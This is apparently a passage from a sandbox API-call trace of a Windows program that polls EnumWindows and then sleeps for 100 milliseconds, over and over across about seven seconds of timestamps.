EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.363] Sleep (dwMilliseconds=0x64) [0229.368] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.369] Sleep (dwMilliseconds=0x64) [0229.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.372] Sleep (dwMilliseconds=0x64) [0229.404] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.405] Sleep (dwMilliseconds=0x64) [0229.432] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.432] Sleep (dwMilliseconds=0x64) [0229.506] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.506] Sleep (dwMilliseconds=0x64) [0229.583] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.583] Sleep (dwMilliseconds=0x64) [0229.752] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.753] Sleep (dwMilliseconds=0x64) [0229.844] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.845] Sleep (dwMilliseconds=0x64) [0229.886] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.886] Sleep (dwMilliseconds=0x64) [0229.927] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.927] Sleep (dwMilliseconds=0x64) [0229.963] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.964] Sleep (dwMilliseconds=0x64) [0229.969] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.970] Sleep (dwMilliseconds=0x64) [0229.974] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.974] Sleep (dwMilliseconds=0x64) [0229.980] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.981] Sleep (dwMilliseconds=0x64) [0229.985] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.985] Sleep (dwMilliseconds=0x64) [0229.987] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.987] Sleep (dwMilliseconds=0x64) [0229.995] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.995] Sleep (dwMilliseconds=0x64) [0229.998] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0229.998] Sleep (dwMilliseconds=0x64) [0230.035] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.036] Sleep (dwMilliseconds=0x64) [0230.052] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.052] Sleep (dwMilliseconds=0x64) [0230.062] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.063] Sleep (dwMilliseconds=0x64) [0230.075] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.075] Sleep (dwMilliseconds=0x64) [0230.145] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.146] Sleep (dwMilliseconds=0x64) [0230.251] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.252] Sleep (dwMilliseconds=0x64) [0230.330] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.330] Sleep (dwMilliseconds=0x64) [0230.414] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.415] Sleep (dwMilliseconds=0x64) [0230.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.497] Sleep (dwMilliseconds=0x64) [0230.565] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.566] Sleep (dwMilliseconds=0x64) [0230.610] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.610] Sleep (dwMilliseconds=0x64) [0230.615] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.616] Sleep (dwMilliseconds=0x64) [0230.622] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.622] Sleep (dwMilliseconds=0x64) [0230.628] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.628] Sleep (dwMilliseconds=0x64) [0230.632] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.632] Sleep (dwMilliseconds=0x64) [0230.636] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.636] Sleep (dwMilliseconds=0x64) [0230.639] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.640] Sleep (dwMilliseconds=0x64) [0230.659] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.659] Sleep (dwMilliseconds=0x64) [0230.664] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.665] Sleep (dwMilliseconds=0x64) [0230.674] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.675] Sleep (dwMilliseconds=0x64) [0230.680] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.680] Sleep (dwMilliseconds=0x64) [0230.684] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.684] Sleep (dwMilliseconds=0x64) [0230.688] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.688] Sleep (dwMilliseconds=0x64) [0230.707] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.708] Sleep (dwMilliseconds=0x64) [0230.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.725] Sleep (dwMilliseconds=0x64) [0230.792] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.792] Sleep (dwMilliseconds=0x64) [0230.902] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.902] Sleep (dwMilliseconds=0x64) [0230.975] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0230.975] Sleep (dwMilliseconds=0x64) [0231.096] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.096] Sleep (dwMilliseconds=0x64) [0231.200] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.201] Sleep (dwMilliseconds=0x64) [0231.243] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.244] Sleep (dwMilliseconds=0x64) [0231.286] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.287] Sleep (dwMilliseconds=0x64) [0231.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.328] Sleep (dwMilliseconds=0x64) [0231.433] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.434] Sleep (dwMilliseconds=0x64) [0231.474] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.474] Sleep (dwMilliseconds=0x64) [0231.553] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.553] Sleep (dwMilliseconds=0x64) [0231.634] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.634] Sleep (dwMilliseconds=0x64) [0231.710] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.710] Sleep (dwMilliseconds=0x64) [0231.789] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.789] Sleep (dwMilliseconds=0x64) [0231.865] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.865] Sleep (dwMilliseconds=0x64) [0231.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.923] Sleep (dwMilliseconds=0x64) [0231.971] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.971] Sleep (dwMilliseconds=0x64) [0231.999] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0231.999] Sleep (dwMilliseconds=0x64) [0232.004] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.004] Sleep (dwMilliseconds=0x64) [0232.015] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.016] Sleep (dwMilliseconds=0x64) [0232.136] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.136] Sleep (dwMilliseconds=0x64) [0232.246] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.246] Sleep (dwMilliseconds=0x64) [0232.325] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.326] Sleep (dwMilliseconds=0x64) [0232.442] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.443] Sleep (dwMilliseconds=0x64) [0232.559] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.559] Sleep (dwMilliseconds=0x64) [0232.599] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.599] Sleep (dwMilliseconds=0x64) [0232.642] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.643] Sleep (dwMilliseconds=0x64) [0232.679] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.679] Sleep (dwMilliseconds=0x64) [0232.684] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.684] Sleep (dwMilliseconds=0x64) [0232.689] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.689] Sleep (dwMilliseconds=0x64) [0232.692] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.693] Sleep (dwMilliseconds=0x64) [0232.695] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.696] Sleep (dwMilliseconds=0x64) [0232.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.701] Sleep (dwMilliseconds=0x64) [0232.704] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.704] Sleep (dwMilliseconds=0x64) [0232.707] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.707] Sleep (dwMilliseconds=0x64) [0232.711] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.711] Sleep (dwMilliseconds=0x64) [0232.714] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.714] Sleep (dwMilliseconds=0x64) [0232.717] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.717] Sleep (dwMilliseconds=0x64) [0232.720] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.720] Sleep (dwMilliseconds=0x64) [0232.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.725] Sleep (dwMilliseconds=0x64) [0232.734] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.734] Sleep (dwMilliseconds=0x64) [0232.737] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.738] Sleep (dwMilliseconds=0x64) [0232.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.741] Sleep (dwMilliseconds=0x64) [0232.743] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.743] Sleep (dwMilliseconds=0x64) [0232.759] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.760] Sleep (dwMilliseconds=0x64) [0232.784] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.784] Sleep (dwMilliseconds=0x64) [0232.860] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.860] Sleep (dwMilliseconds=0x64) [0232.937] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0232.937] Sleep (dwMilliseconds=0x64) [0233.013] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.014] Sleep (dwMilliseconds=0x64) [0233.106] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.106] Sleep (dwMilliseconds=0x64) [0233.145] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.146] Sleep (dwMilliseconds=0x64) [0233.208] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.208] Sleep (dwMilliseconds=0x64) [0233.266] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.269] Sleep (dwMilliseconds=0x64) [0233.271] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.271] Sleep (dwMilliseconds=0x64) [0233.274] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.274] Sleep (dwMilliseconds=0x64) [0233.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.277] Sleep (dwMilliseconds=0x64) [0233.279] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.279] Sleep (dwMilliseconds=0x64) [0233.280] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.283] Sleep (dwMilliseconds=0x64) [0233.284] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.285] Sleep (dwMilliseconds=0x64) [0233.287] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.287] Sleep (dwMilliseconds=0x64) [0233.289] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.289] Sleep (dwMilliseconds=0x64) [0233.291] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.291] Sleep (dwMilliseconds=0x64) [0233.293] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.293] Sleep (dwMilliseconds=0x64) [0233.295] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.295] Sleep (dwMilliseconds=0x64) [0233.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.297] Sleep (dwMilliseconds=0x64) [0233.298] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.299] Sleep (dwMilliseconds=0x64) [0233.300] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.300] Sleep (dwMilliseconds=0x64) [0233.303] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.303] Sleep (dwMilliseconds=0x64) [0233.305] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.305] Sleep (dwMilliseconds=0x64) [0233.306] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.306] Sleep (dwMilliseconds=0x64) [0233.308] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.308] Sleep (dwMilliseconds=0x64) [0233.309] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.309] Sleep (dwMilliseconds=0x64) [0233.311] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.311] Sleep (dwMilliseconds=0x64) [0233.313] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.313] Sleep (dwMilliseconds=0x64) [0233.314] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.314] Sleep (dwMilliseconds=0x64) [0233.316] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.316] Sleep (dwMilliseconds=0x64) [0233.317] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.317] Sleep (dwMilliseconds=0x64) [0233.319] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.320] Sleep (dwMilliseconds=0x64) [0233.324] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.324] Sleep (dwMilliseconds=0x64) [0233.326] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.326] Sleep (dwMilliseconds=0x64) [0233.328] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.328] Sleep (dwMilliseconds=0x64) [0233.330] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.330] Sleep (dwMilliseconds=0x64) [0233.340] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.340] Sleep (dwMilliseconds=0x64) [0233.342] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.342] Sleep (dwMilliseconds=0x64) [0233.344] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.344] Sleep (dwMilliseconds=0x64) [0233.346] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.346] Sleep (dwMilliseconds=0x64) [0233.348] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.348] Sleep (dwMilliseconds=0x64) [0233.350] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.350] Sleep (dwMilliseconds=0x64) [0233.352] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.352] Sleep (dwMilliseconds=0x64) [0233.353] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.353] Sleep (dwMilliseconds=0x64) [0233.355] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.355] Sleep (dwMilliseconds=0x64) [0233.356] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.356] Sleep (dwMilliseconds=0x64) [0233.358] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.358] Sleep (dwMilliseconds=0x64) [0233.359] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.359] Sleep (dwMilliseconds=0x64) [0233.361] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.361] Sleep (dwMilliseconds=0x64) [0233.364] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.364] Sleep (dwMilliseconds=0x64) [0233.366] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.366] Sleep (dwMilliseconds=0x64) [0233.367] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.367] Sleep (dwMilliseconds=0x64) [0233.371] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.371] Sleep (dwMilliseconds=0x64) [0233.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.372] Sleep (dwMilliseconds=0x64) [0233.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.374] Sleep (dwMilliseconds=0x64) [0233.375] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.375] Sleep (dwMilliseconds=0x64) [0233.377] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.377] Sleep (dwMilliseconds=0x64) [0233.379] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.380] Sleep (dwMilliseconds=0x64) [0233.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.381] Sleep (dwMilliseconds=0x64) [0233.383] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.383] Sleep (dwMilliseconds=0x64) [0233.395] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.395] Sleep (dwMilliseconds=0x64) [0233.445] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.446] Sleep (dwMilliseconds=0x64) [0233.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.548] Sleep (dwMilliseconds=0x64) [0233.635] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.635] Sleep (dwMilliseconds=0x64) [0233.723] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.723] Sleep (dwMilliseconds=0x64) [0233.780] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.780] Sleep (dwMilliseconds=0x64) [0233.822] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.822] Sleep (dwMilliseconds=0x64) [0233.863] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.863] Sleep (dwMilliseconds=0x64) [0233.885] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.885] Sleep (dwMilliseconds=0x64) [0233.887] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.887] Sleep (dwMilliseconds=0x64) [0233.889] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.890] Sleep (dwMilliseconds=0x64) [0233.896] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.896] Sleep (dwMilliseconds=0x64) [0233.900] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.901] Sleep (dwMilliseconds=0x64) [0233.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.911] Sleep (dwMilliseconds=0x64) [0233.926] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.927] Sleep (dwMilliseconds=0x64) [0233.954] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.954] Sleep (dwMilliseconds=0x64) [0233.994] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0233.995] Sleep (dwMilliseconds=0x64) [0234.077] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.077] Sleep (dwMilliseconds=0x64) [0234.173] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.173] Sleep (dwMilliseconds=0x64) [0234.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.250] Sleep (dwMilliseconds=0x64) [0234.291] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.292] Sleep (dwMilliseconds=0x64) [0234.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.332] Sleep (dwMilliseconds=0x64) [0234.369] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.369] Sleep (dwMilliseconds=0x64) [0234.401] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.401] Sleep (dwMilliseconds=0x64) [0234.405] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.406] Sleep (dwMilliseconds=0x64) [0234.410] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.410] Sleep (dwMilliseconds=0x64) [0234.414] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.414] Sleep (dwMilliseconds=0x64) [0234.416] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.417] Sleep (dwMilliseconds=0x64) [0234.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.427] Sleep (dwMilliseconds=0x64) [0234.502] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.502] Sleep (dwMilliseconds=0x64) [0234.545] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.546] Sleep (dwMilliseconds=0x64) [0234.588] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.589] Sleep (dwMilliseconds=0x64) [0234.628] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.628] Sleep (dwMilliseconds=0x64) [0234.669] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.669] Sleep (dwMilliseconds=0x64) [0234.709] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.709] Sleep (dwMilliseconds=0x64) [0234.749] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.749] Sleep (dwMilliseconds=0x64) [0234.786] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.787] Sleep (dwMilliseconds=0x64) [0234.809] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.809] Sleep (dwMilliseconds=0x64) [0234.811] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.811] Sleep (dwMilliseconds=0x64) [0234.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.814] Sleep (dwMilliseconds=0x64) [0234.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.820] Sleep (dwMilliseconds=0x64) [0234.823] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.823] Sleep (dwMilliseconds=0x64) [0234.843] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.843] Sleep (dwMilliseconds=0x64) [0234.872] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.873] Sleep (dwMilliseconds=0x64) [0234.919] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0234.920] Sleep (dwMilliseconds=0x64) [0234.999] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.000] Sleep (dwMilliseconds=0x64) [0235.103] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.103] Sleep (dwMilliseconds=0x64) [0235.197] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.197] Sleep (dwMilliseconds=0x64) [0235.252] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.252] Sleep (dwMilliseconds=0x64) [0235.294] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.295] Sleep (dwMilliseconds=0x64) [0235.331] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.332] Sleep (dwMilliseconds=0x64) [0235.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.373] Sleep (dwMilliseconds=0x64) [0235.387] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.387] Sleep (dwMilliseconds=0x64) [0235.391] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.391] Sleep (dwMilliseconds=0x64) [0235.395] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.395] Sleep (dwMilliseconds=0x64) [0235.400] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.400] Sleep (dwMilliseconds=0x64) [0235.407] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.408] Sleep (dwMilliseconds=0x64) [0235.411] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.411] Sleep (dwMilliseconds=0x64) [0235.413] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.413] Sleep (dwMilliseconds=0x64) [0235.418] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.418] Sleep (dwMilliseconds=0x64) [0235.422] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.422] Sleep (dwMilliseconds=0x64) [0235.452] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.453] Sleep (dwMilliseconds=0x64) [0235.477] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.477] Sleep (dwMilliseconds=0x64) [0235.515] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.515] Sleep (dwMilliseconds=0x64) [0235.594] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.594] Sleep (dwMilliseconds=0x64) [0235.743] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.743] Sleep (dwMilliseconds=0x64) [0235.782] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.783] Sleep (dwMilliseconds=0x64) [0235.822] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.823] Sleep (dwMilliseconds=0x64) [0235.862] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.862] Sleep (dwMilliseconds=0x64) [0235.904] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.904] Sleep (dwMilliseconds=0x64) [0235.943] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.943] Sleep (dwMilliseconds=0x64) [0235.985] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0235.985] Sleep (dwMilliseconds=0x64) [0236.003] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.003] Sleep (dwMilliseconds=0x64) [0236.007] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.007] Sleep (dwMilliseconds=0x64) [0236.010] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.010] Sleep (dwMilliseconds=0x64) [0236.013] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.014] Sleep (dwMilliseconds=0x64) [0236.018] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.019] Sleep (dwMilliseconds=0x64) [0236.022] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.022] Sleep (dwMilliseconds=0x64) [0236.025] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.026] Sleep (dwMilliseconds=0x64) [0236.028] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.029] Sleep (dwMilliseconds=0x64) [0236.032] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.032] Sleep (dwMilliseconds=0x64) [0236.036] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.037] Sleep (dwMilliseconds=0x64) [0236.050] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.050] Sleep (dwMilliseconds=0x64) [0236.053] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0236.053] Sleep (dwMilliseconds=0x64) [0236.055] EnumWindows 